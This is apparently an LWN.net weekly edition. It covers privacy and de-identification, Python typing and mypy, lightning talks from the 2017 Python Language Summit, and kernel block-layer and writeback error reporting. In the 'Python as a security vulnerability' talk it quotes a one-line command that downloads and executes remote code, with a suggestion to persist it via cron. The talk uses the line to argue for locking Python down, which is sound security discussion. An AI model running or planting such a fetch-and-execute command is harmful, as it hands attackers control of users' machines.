LWN.net Weekly Edition for June 8, 2017

Welcome to the LWN.net Weekly Edition for June 8, 2017

This edition contains the following feature content:

  • Guarding personally identifiable information: Steve Touw on the limits of de-identification and better ways to protect private data.
  • Classes and types in the Python typing module: Mark Shannon argues that conflating types and classes is a mistake.
  • Status of mypy and type checking: Jukka Lehtosalo's update on type checking for Python.
  • Language summit lightning talks: a collection of short topics from the 2017 Python Language Summit.
  • Improved block-layer error handling: better error codes and writeback-error reporting.
  • Waiting for entropy: helping kernel code wait until the random-number pool is ready.
  • Range reader/writer locks for the kernel: locks that cover only part of a resource.

This week's edition also includes these inner pages:

  • Brief items: Brief news items from throughout the community.
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (6 posted)

Guarding personally identifiable information

June 7, 2017

This article was contributed by Andy Oram

There is no viable way to prevent data from being collected about us in the current age of computing. But if institutions insist on knowing our financial status, purchasing habits, health information, political preferences, and so on, they have a responsibility to keep this data—known as personally identifiable information (PII)—from leaking to unauthorized recipients. At the 2017 Strata data conference in London, Steve Touw presented a session on privacy-enhancing technologies. In a fast-paced 40 minutes he covered the EU regulations about privacy, the most popular technical measures used to protect PII, and some pointed opinions about what works and what should be thrown into the dustbin.

To jump straight to Touw's conclusions: we need to maintain much tighter control over data that we share. Like most who have studied the question of PII, Touw finds flaws in current forms of de-identification, which is the technique we rely on most often for protecting PII. He suggests combining de-identification techniques with restrictions on the frequency and types of queries executed against data sets, along with a context-based approach to data protection that is much more sophisticated than current access controls.

No single talk would have enough time to explain thoroughly all the issues in protecting PII. Touw focused on European legal requirements (which made sense for a conference held in London), technical difficulties in de-identifying data, and good organizational practices for protecting privacy. This article fills out some of the background underlying these issues as well.

Common constraints on data collection

Although people viscerally fear the collection of personal data, and alternatives such as Vendor Relationship Management have been suggested for leaving control over data in the hands of the individual, there are few barriers in the way of organizations that collect this data. The EU has regulated data collection for decades, and its General Data Protection Regulation (GDPR), which is supposed to come into force on May 25, 2018, requires limitations that are familiar to those in the privacy field. These include minimization, data retention limits, and restrictions on use to the original purpose for collecting the data. I'll offer a brief overview of these key concepts.

Minimization means collecting as little data as you can to meet your purpose. If you need to know whether someone is old enough to drive, you can record that as a binary field without recording the person's age. If you need to know how many cars pass down a street each day in order to plan traffic flow, you don't need to record the license plates of the cars.

Data retention limits are a form of minimization. Most data's value diminishes greatly after a few months. For instance, a person's income may change, so income information collected a year ago may no longer be useful for marketing. Therefore, without much of a sacrifice in accuracy, an organization can protect privacy by discarding data after a certain time interval.

Restricting use to the original purpose of data collection is an even stricter criterion. Supposedly it would mean that a retailer who collects your information in order to charge your credit card should not use that information to improve its marketing campaigns.

Governments in the US impose restrictions only on specific classes of information, such as data collected by health care providers. Fair Information Practices, which cover some broad issues such as transparency and the right to correct errors, are widely praised but not required by law. They also go nowhere near as far as EU laws in granting rights to individuals for their data.

Although the GDPR does not require organizations to obtain consent for data collection, Touw advised them always to do so. Otherwise, the organizations may be asked to demonstrate in court that they had a "legitimate interest" in the data, which is a subjective judgment. Touw did not go into the problems of consent forms, so his advice was really aimed at protecting the company doing the collection, not the individuals.

The dilemma of data sharing

Protection of personal data takes place on two levels: while storing it at the site collecting the data, and while granting access to other parties. Why would sites offer data to other parties? Touw did not cover this question, but there are a few reasons behind that practice.

Organizations can realize a large income stream from selling the data, which can then be used for purposes ranging from benign to ill. Governments collect and share data that is supposed to be for the public benefit (e.g. race and gender, incidences of communicable diseases). Public agencies, and even some companies, believe their data could contribute to initiatives in health, anti-corruption efforts, and other areas. Some institutions also anticipate that they might benefit from tools developed by others. Thus, Netflix released data on who viewed its video content for the Netflix prize of 2009, hoping to get a better algorithm for video recommendations from experts in the field.

When data is shared publicly, the organization tries to strip direct identifiers, such as names and social security numbers, and tries to reduce the risk that indirect identifiers such as postal codes can be used to re-identify individuals. Even when organizations sell their data privately, they often try to de-identify it in similar ways. The GDPR gives organizations pretty much free rein to use and release data, so long as it is correctly de-identified.

Problems with de-identification

The bulk of Touw's talk was devoted to the risks of de-identification, also known as anonymization. His skepticism about de-identification is shared by most experts in computing who have examined the field. In particular, he looked at techniques for pseudonymity and K-anonymity, claiming that they can't prevent re-identification unless they're pursued so far that they render the output data useless.

Touw predicted that organizations will stop releasing free, de-identified data sets, because de-identification has too often proven insufficient and too many embarrassing breaches have been publicized. Besides the Netflix prize mentioned earlier, where researchers re-identified Netflix users from the data [PDF], Touw mentioned some other open data sets and spent a good deal of time on New York City taxi data.

All these re-identification attacks depended on the mosaic effect, or finding other publicly available sources and joining them with the released data set. (Touw called this a "link attack.") In the case of the New York taxi data, most of us would have nothing to fear, but celebrities who are sighted at the beginning or end of their rides could potentially be re-identified. Touw claimed that New York City could not have prevented the re-identification by fuzzing or removing fields from the data, a point also made by the researcher who originally performed the re-identification attack. I believe Touw moved the goalposts a bit by adding new sources of information to fuel possible attacks as he removed existing information. Still, he made a case that the only way to protect celebrities would be to remove everything of value from the data.

Pseudonymization is the easiest way to de-identify data. It consists of putting a meaningless value in place of a personally identifying field. People may still be re-identified, though, if they possess unique values for other fields. For instance, if someone is the only Hispanic person in a particular apartment building, a combination of race and address can identify them. If someone suffers from a rare disease, a hospital listing with diagnoses may reveal sensitive information to someone who knows they have that disease.
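
As a rough sketch of what pseudonymization involves (the keyed-hash approach and the field names here are assumptions for illustration, not something Touw presented), a few lines of Python suffice:

    import hashlib
    import hmac

    SECRET_KEY = b"known-only-to-the-data-holder"

    def pseudonymize(identifier):
        """Replace a direct identifier with a stable but meaningless token."""
        return hmac.new(SECRET_KEY, identifier.encode(), hashlib.sha256).hexdigest()[:16]

    record = {"name": "Alice Jones", "race": "Hispanic", "address": "12 Oak St, Apt 4"}
    released = dict(record, name=pseudonymize(record["name"]))
    # The name is now an opaque token, but the combination of race and address
    # may still single the person out, which is the risk described above.
    print(released)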

K-anonymity addresses the problem of unique values, known also as high cardinality values. The technique makes sure there are enough duplicate values in different rows of data so that no individual is identified by a particular combination of fields. K-anonymity works by making values in fields more general: a common example is offering just the first three digits of a five-digit ZIP code. Because the digits are hierarchical (the code 200 is a single contiguous geographic area that contains 20001, 20002, etc.), generalizing the ZIP code exposes data that is still useful but is less specific.
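
The generalization step and a check for k-anonymity can be sketched in a few lines (the field names and values are invented for the example):

    from collections import Counter

    def generalize_zip(zip_code):
        """Keep only the first three digits of a five-digit ZIP code."""
        return zip_code[:3] + "XX"

    rows = [
        {"zip": "20001", "age": 34},
        {"zip": "20002", "age": 35},
        {"zip": "20003", "age": 36},
    ]
    generalized = [{"zip": generalize_zip(r["zip"]), "age": r["age"] // 10 * 10}
                   for r in rows]

    def is_k_anonymous(rows, quasi_identifiers, k):
        """True if every combination of quasi-identifier values occurs at least k times."""
        counts = Counter(tuple(r[q] for q in quasi_identifiers) for r in rows)
        return all(count >= k for count in counts.values())

    print(is_k_anonymous(rows, ["zip", "age"], k=3))          # False: every row is unique
    print(is_k_anonymous(generalized, ["zip", "age"], k=3))   # True after generalization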

Touw briefly mentioned two enhancements to K-anonymity, known as L-diversity and T-closeness, that are more restrictive. L-diversity [PDF] restricts the number of unique values in information by taking into account the probability that an attacker can guess something about the target (such as their address). T-closeness [PDF] tries to prevent re-identification by making sure that each division in the data (such as ZIP code) contains sensitive values with about the same frequency as the general population. Touw claimed L-diversity and T-closeness are more trouble than they're worth, and that all these techniques leave people at risk of re-identification unless the data is generalized to the point where it's worthless.

When you listen to data scientists like Touw who have investigated the limitations of anonymization, you come away feeling that there's no point to doing it. But let's step back and consider whether this is a constructive conclusion. Nearly all published examples of re-identification took advantage of poor de-identification techniques. Done right, according to proponents, de-identification is still safe. On the other hand, it's easy for proponents of de-identification to say that a technique was flawed after the fact.

To resolve the dilemma, one can look at de-identification like encryption. We can be fairly certain that, within a few decades, increased computing power and new algorithms will allow attackers to break our encryption. We keep increasing key sizes over the decades to compensate for this certainty. And yet we keep using encryption, because nothing better exists. De-identification is still worth using too. But Touw has some alternative ways to carry it out.

Proposed remedies

In addition to advising that organizations obtain consent for data collection, Touw offered two practices that are more effective than the previous methods of data protection: restricting data requests to a safe set of queries and using context-based restrictions. Neither practice is in common use now, but models exist for their use.

If an organization does not release data in the open, it can achieve some of the organizational and social benefits of open data by offering a limited set of queries to third parties. Touw promoted the concept of differential privacy, which is a complex technology understood by relatively few data experts. The concept has been attributed [PDF] to Cynthia Dwork, who co-authored a key paper [PDF] laying out the theory. She explains differential privacy there (on page 6) by saying, "it ensures that any sequence of outputs (responses to queries) is 'essentially' equally likely to occur, independent of the presence or absence of any individual." It never reveals any specific fields in the underlying data, but provides a set of aggregate queries—such as sums or averages—that mathematical analysis of the data set has shown to be privacy-preserving.

Touw demonstrated how a specific value for a specific person might be obtained by asking the same question—or to disguise the attack, many questions that differ slightly—over and over. Each question produces a slightly different result in the field you're interested in, but if you take the average of these results you can get very close to the original value. So some form of rate-limiting must be imposed on queries.
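
A toy version of that averaging attack shows why unrestricted repetition defeats the added noise (the noise model and numbers are invented purely for illustration):

    import random

    TRUE_SALARY = 72000           # the value the attacker is after

    def noisy_query():
        """A query interface that perturbs each answer with random noise."""
        return TRUE_SALARY + random.gauss(0, 5000)

    answers = [noisy_query() for _ in range(10000)]
    estimate = sum(answers) / len(answers)
    # With enough repetitions the noise averages out and the estimate converges
    # on the true value, which is why queries must be rate-limited or budgeted.
    print(round(estimate))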

Touw's other major recommendation involves context-based or purpose-based restrictions, which he called "the future of privacy controls". They go far beyond individual or group access controls used by most sites.

One example of context-based restrictions is time-based access. A conventional employer might allow access by its employees from 9:00 AM to 5:00 PM. In a more flexible environment, such as a hospital where nurses' shifts have irregular beginnings and ends, the hospital may allow each nurse access to data when their schedule indicates they are on duty.

Another type of context-based restriction grants users limited access to data under a license that spells out what they want to do (say, cancer research) and how they can use the data. If the user starts issuing requests for certain combinations of rows or columns that don't seem to fulfill the purpose for which the license was granted, access can be denied.
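
Neither form of context-based restriction requires exotic machinery. The following sketch is entirely hypothetical (the policy structure and field names are invented, not taken from anything Touw described), but it shows the general shape of such a check:

    from datetime import datetime

    POLICY = {
        "nurse-42": {"on_duty": ("07:30", "19:30"),
                     "purpose": "patient care",
                     "allowed_columns": {"patient_id", "medication", "dosage"}},
    }

    def may_access(user, columns, purpose, now):
        """Grant access only during the user's shift, for the licensed purpose and columns."""
        rule = POLICY.get(user)
        if rule is None or purpose != rule["purpose"]:
            return False
        start, end = rule["on_duty"]
        if not start <= now.strftime("%H:%M") <= end:
            return False
        return set(columns) <= rule["allowed_columns"]

    print(may_access("nurse-42", {"patient_id", "dosage"}, "patient care",
                     datetime(2017, 6, 7, 14, 0)))    # True: on duty, licensed purpose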

Touw advises organizations not to try to combine all their data in a single data lake—or worse still, to copy data into a new repository in order to perform access controls. Maintaining two copies of data is always cumbersome and error-prone. In addition, you now offer attackers twice as many opportunities to break into the data. Instead, he suggests that an organization set up what he calls a "data control plane". It implements all the policies defined by the organization and covers all data stores. The control plane should expose easy ways to create rules, make sure new policies take effect immediately, recognize the types of context mentioned earlier, and maintain audits that show what the data was used for. Organizations must also exercise governance over data so they know who owns it, who has access to it and under what circumstances, and how to manage the data's lifecycle (acquiring, storing, selling, purging). They can't just rely on the IT department to define and implement policies.

Few if any commercial vendors offer the advanced privacy-protecting technologies recommended by Touw. So at this point, attackers run ahead of most organizations that maintain data on us. Still, Touw's talk opens up a valuable debate about what real privacy protection looks like in 2017.

Comments (45 posted)

Classes and types in the Python typing module

By Jake Edge
June 7, 2017

Python Language Summit

Mark Shannon is concerned that the Python core developers may be replaying a mistake: treating two distinct things as being the same. Treating byte strings and Unicode text strings interchangeably is part of what led to Python 3, so he would rather not see that happen again with types and classes. The Python typing module, which is meant to support type hints, currently implements types as classes. That leads to several kinds of problems, as Shannon described in his session at the 2017 Python Language Summit.

[Mark Shannon]

He wanted to convince people that the typing module is "heading in the wrong direction". He is not opposed to type hints or variable annotations, but is concerned that the typing module is conflating types and classes in a way that is detrimental. Classes are for object-oriented programming, while types declare what something is. A class can be a subclass of another without being a subtype of it. List[int] and List[float] (lists of integers and floating point numbers, respectively) are distinct types, he said, but are both implemented by the list class. In the current typing module, types are implemented as classes.
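
The conflation is easy to observe at run time. In the sketch below (not from Shannon's talk), the two annotated lists are distinct types to a checker, yet both are plain list objects when the program runs:

    from typing import List

    ints: List[int] = [1, 2, 3]
    floats: List[float] = [1.0, 2.5]

    # The typing-level distinction disappears at run time: both are ordinary lists.
    print(type(ints) is list and type(floats) is list)   # True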

This has happened before, with bytes and Unicode in the Python 2 days, Shannon said. He would rather see this get addressed now, before the core developers (and the language) get to that point again.

Practical problems

Using classes for types has some concrete negative effects. Classes are "large and bad" in CPython, but are much worse for MicroPython. A namedtuple-based implementation of List[int] is around 1/60 the size of the class-based one.

There are also some oddities. He showed two class definitions:

    class MyList(Sequence[int], list): pass

    class MyList(list, Sequence[int]): pass

In both cases, MyList inherits from builtins.list and the sequence of integers type (Sequence[int]), but a simple append operation on an instance of one of them is 10% faster than on an instance of the other.

It turns out that the method resolution order (MRO) comes into play. MRO determines which method actually gets called when multiple inheritance is used; Python tracks that on the __mro__ attribute. For a class that inherits builtins.list, the MRO has three items, but for List[int] it has 17.
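
The difference can be seen by inspecting __mro__ directly. The class names below are invented for the example, and the exact counts depend on the typing implementation; the 17-entry figure comes from the Python 3.6-era module Shannon was describing:

    from typing import Sequence

    class PlainList(list):
        pass

    class GenericList(Sequence[int], list):
        pass

    print(len(PlainList.__mro__))     # 3: PlainList, list, object
    print(len(GenericList.__mro__))   # much longer: typing's generic machinery adds many entries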

Types and type constructors are already hard enough to understand, he said. Turning them into classes and metaclasses just makes that worse. In addition, since types in typing already have a custom metaclass, it makes it difficult to define a type for a class that has its own custom metaclass.

When adopting type hints, the core developers made a few promises, Shannon said. Type hints would allow programs to be checked for type errors, they would always be optional, and using them should not slow your program down. The first two of those have been kept, but the last has not. Every time you run a program with type hints, it pulls in a large chunk of code that slows things down.

Options

He presented three options. The first was to continue using types as classes, but to painfully check that an instance of Iterable[int] actually produces integers for each entry, and then hope that things don't get as bad as they did for bytes and Unicode. Another was "the status quo"; much the same as the first, but to ignore the checks that seem expensive. The option that he prefers is to keep types and classes distinct, which will remove the "conceptual muddle" and reduce the run-time overhead of using types. He has a minimal prototype implementation on GitHub to demonstrate what he means.

Attendees were generally supportive of his ideas; Guido van Rossum filed a bug for typing on some of the issues he raised. There were also suggestions on ways to reduce the overhead for code that uses type hints. Łukasz Langa noted that Instagram had reduced the size of compiled Python (i.e. bytecode) by 1.5% just by removing the docstrings; perhaps something similar could be done to remove the type annotations to reduce the size of the code.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Status of mypy and type checking

By Jake Edge
June 7, 2017

Python Language Summit

In his 2017 Python Language Summit session, Jukka Lehtosalo updated attendees on the status of type checking for the language, in general, and for the mypy static type checker. There are new features in the typing module and in mypy, as well as work in progress and planned features for both. For a feature, type hints, that is really only around three years old, there has been a lot of progress made—but, of course, there is still more to come.

The most significant new thing for types in Python is the adoption of PEP 526, which adds a way to annotate variables with their types. As of Python 3.6, variable annotations can be used for regular variables, instance variables, and class variables. The latter is made possible with the ClassVar[] annotation that has been added to typing. Other additions include NewType() for creating distinct types and NoReturn for functions that do not return.
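
A short example showing those additions in use (the names are invented for illustration, and NoReturn requires a sufficiently recent typing module):

    from typing import ClassVar, NewType, NoReturn

    UserId = NewType('UserId', int)       # a distinct type to the checker, a plain int at run time

    class Account:
        max_logins: ClassVar[int] = 3     # a class variable, per PEP 526
        owner: UserId                     # an instance variable annotation, no value assigned

        def __init__(self, owner: UserId) -> None:
            self.owner = owner

    def abort(message: str) -> NoReturn:  # declared never to return normally
        raise RuntimeError(message)

    balance: float = 0.0                  # a module-level variable annotation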

Some recent mypy features include function overloads in source files (and not just stub files) and basic metaclass support, but there is still work to be done on the latter. There is also a new "quick mode" that is up to ten times faster. Quick mode is an incremental check; it just looks at the file itself and assumes that what it imports does not need to be checked.
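
Overloads in an ordinary source file use the same typing.overload decorator that was previously only useful in stub files; a small sketch (the function is invented here):

    from typing import List, overload

    @overload
    def scale(value: int, factor: int) -> int: ...
    @overload
    def scale(value: List[float], factor: int) -> List[float]: ...

    def scale(value, factor):
        # The undecorated definition is the one that actually runs; the
        # overloads above exist only for the type checker.
        if isinstance(value, list):
            return [v * factor for v in value]
        return value * factor

    print(scale(3, 2))            # 6
    print(scale([1.0, 2.0], 2))   # [2.0, 4.0]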

There are also some experimental mypy features that Lehtosalo mentioned. The mypy_extensions module contains various extensions to typing that are being tried out. Some of those may get promoted to typing if they work out. One of those is the more flexible Callable[] type, which has a syntax that is "not pretty" but works. More information about these and other features can be found in his mypy 0.510 release announcement.
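
The "not pretty" Callable[] syntax uses argument-specifier helpers from mypy_extensions; the following rough sketch follows the package's documentation of the time, though the exact spellings may have changed since:

    from typing import Callable
    from mypy_extensions import Arg, VarArg

    # A callable taking a named int argument followed by any number of floats,
    # returning a string.
    Formatter = Callable[[Arg(int, 'count'), VarArg(float)], str]

    def report(count: int, *values: float) -> str:
        return "%d values, sum %.1f" % (count, sum(values))

    f: Formatter = report
    print(f(3, 1.0, 2.0, 3.0))    # 3 values, sum 6.0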

There are also some features in progress for mypy, he said. The TypedDict type, which will allow dictionaries that specify the types of values for specific keys, is one. Another is support for structural subtyping using Protocols. There are some planned improvements for type variables, including adding support for variadic type variables and for variables that describe function argument specifications. Decorators sometimes change a function's signature, so support for declaring the decorated type of a function is planned as well.

Mypy is starting to be used in production. At Dropbox, where Lehtosalo works, 700,000 lines of code have been annotated and are being checked with mypy. The Zulip project has 95,000 lines of code annotated; Facebook, Quora, and others are using the tool as well. There has been quite a bit of positive user feedback, he said. Performance is still an issue, however; a full run at Dropbox takes around two minutes, which is "barely acceptable". But a large scale roll-out at Dropbox is under way.

There were some lessons learned along the way. To start with, changing type systems is "very expensive" and causes a fair amount of pain for users. That means Dropbox may become stuck with some early choices it made before some features had been added to typing and mypy. Having the typing module in the standard library has turned out to be annoying, because there are new features in the 3.6 release that can't be used in 3.5, which is the version used by Dropbox. typing is moving fast, so sometimes it makes sense to backport features into earlier versions, he said.

There are a lot of contributors to the projects (both typing and mypy), especially for typeshed, which collects annotations for Python built-ins and the standard library. The two other major type checkers, pytype and PyCharm, also contribute, so there is a real community building up around type annotations.

Mark Shannon asked when the project would decide to stop adding features for ever-more-obscure type constructs; "at what point do you say 'just use Any'?" Lehtosalo said that the project tends to consider constructs that have multiple users and uses throughout the ecosystem and is not interested in adding support for lots of one-off corner cases.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (none posted)

Language summit lightning talks

By Jake Edge
June 7, 2017

Python Language Summit

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

[Mark Shannon & micro:bit]

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library. It even has asyncio support. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said; it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not necessarily need to be random, though that would be fine; it just needs to change the order enough that reliance on ordering would be caught in testing.
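
The behavior at issue is easy to demonstrate. In the sketch below, the plain dict keeps insertion order on CPython 3.6 only as an implementation detail, while collections.OrderedDict guarantees it as documented behavior:

    from collections import OrderedDict

    d = {}
    for key in ("first", "second", "third"):
        d[key] = len(key)
    print(list(d))    # insertion order on CPython 3.6, but only as an implementation detail

    od = OrderedDict()
    for key in ("first", "second", "third"):
        od[key] = len(key)
    print(list(od))   # ordering guaranteed by the documented API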

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, would there be a need for an UnorderedDict, an attendee asked. Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

[Steve Dower]

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

    python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

[Dmitry Trofimov & Andrey Vlasovskikh]

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf (documentation here). It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

Comments (13 posted)

Improved block-layer error handling

By Jonathan Corbet
June 2, 2017
The kernel's filesystem and block layers are places where a lot of things can go wrong, often with unpleasant consequences. To make things worse, when things do go wrong, informing user space about the problem can be difficult as a consequence of how block I/O works. That can result in user-space applications being unaware of trouble at the I/O level, leading to lost data and enraged users. There are now two separate (and complementary) proposals under discussion that aim to improve how error reporting is handled in the block layer.

Block-layer error codes

One problem with existing reporting mechanisms is that they are based on standard Unix error codes, but those codes were never designed to handle the wide variety of things that can go wrong with block I/O. As a result, almost any type of error ends up being reported back to the higher levels of the block layer (and user space) as EIO (I/O error) with no further detail available. That makes it hard to determine, at both the filesystem and user-space levels, what the correct response to the error should be.

Christoph Hellwig is working to change that situation by adding a dedicated set of error codes to be used within the block layer. This patch set adds a new blk_status_t type to describe block-level errors. The specific error codes added thus far correspond mostly to the existing Unix codes. So BLK_STS_TIMEOUT, indicating an operation timeout, maps to ETIMEDOUT, while BLK_STS_NEXUS, describing a problem connecting to a remote storage device, becomes EBADE ("invalid exchange"). There is, according to Hellwig, "some low hanging fruit" that can be improved by additional error codes, but those codes are not added as part of this patch set.

The new errors can be generated at the lowest levels of the kernel's block drivers, and will be propagated to the point that filesystem code sees them in the results of its block I/O requests. To get there, the bi_error field in struct bio, which contained a Unix error code, has been renamed to bi_status. In-tree filesystems have been changed to use the new field, but they do not yet act on the additional information that may be available there.

This is, in other words, relatively early infrastructural work that makes it possible for the block layer to produce better error information. Actually making use of that infrastructure will have to wait until this work is accepted and headed toward the mainline.

Reporting writeback errors

One particular challenge for block I/O error reporting is that many I/O requests are not the direct result of a user-space operation. Most file data is buffered through the kernel's page cache, and there can be a significant delay between when an application writes data into the cache and when a writeback operation flushes that data to persistent storage. If something goes wrong during writeback, it can be hard to report that error back to user space since the operation that caused that writeback in the first place will have long since completed. The kernel makes an attempt to save the error and report it on a subsequent system call, but it is easy for that information to be lost with the result that the application is unaware that it has lost data.

Jeff Layton's writeback-error reporting patches are an attempt to improve this situation. He adds a mechanism that is based on the idea that applications that care about their data will occasionally call fsync() to ensure that said data has made it to persistent storage. Current kernels might report a writeback error on an fsync() call, but there are a number of ways in which that can fail to happen. With the new mechanism in place, any application that holds an open file descriptor will reliably get an error return on the first fsync() call that is made after a writeback error occurs.

To get there, the patch set creates a new type (errseq_t) for the reporting of writeback errors. It is a 32-bit value with two separate fields: an error code (of the standard Unix variety) and a sequence counter. That counter tracks the number of times that an error has been reported in that particular errseq_t value; kernel code can remember the counter value of the last error reported to user space. If the counter increases on a future check, a new error has been encountered.

The errseq_t variables are added to the address_space structure, which controls the mapping between pages in the page cache and those in persistent storage. The writeback process uses this structure to determine where dirty pages should be written to, so it is a logical place to store error information. Meanwhile, any open file descriptor referring to a given file will include a pointer to that address_space structure, so this errseq_t value is visible (within the kernel) to all processes accessing the file. Each open file (tracked by struct file) gains a new f_wb_err field to remember the sequence number of the last reported error.

Storing that value in the file structure has an important benefit: it makes it possible to report a writeback error exactly once to every process that calls fsync() on that file, regardless of when they make that call. In current kernels, only the first caller after an error occurs has a chance of seeing that error information. It would arguably be better to report the error only to the process that actually wrote the data that experienced the error, but tracking things at that level would be cumbersome and slow. By informing all processes, this mechanism ensures that the right process will get the news.

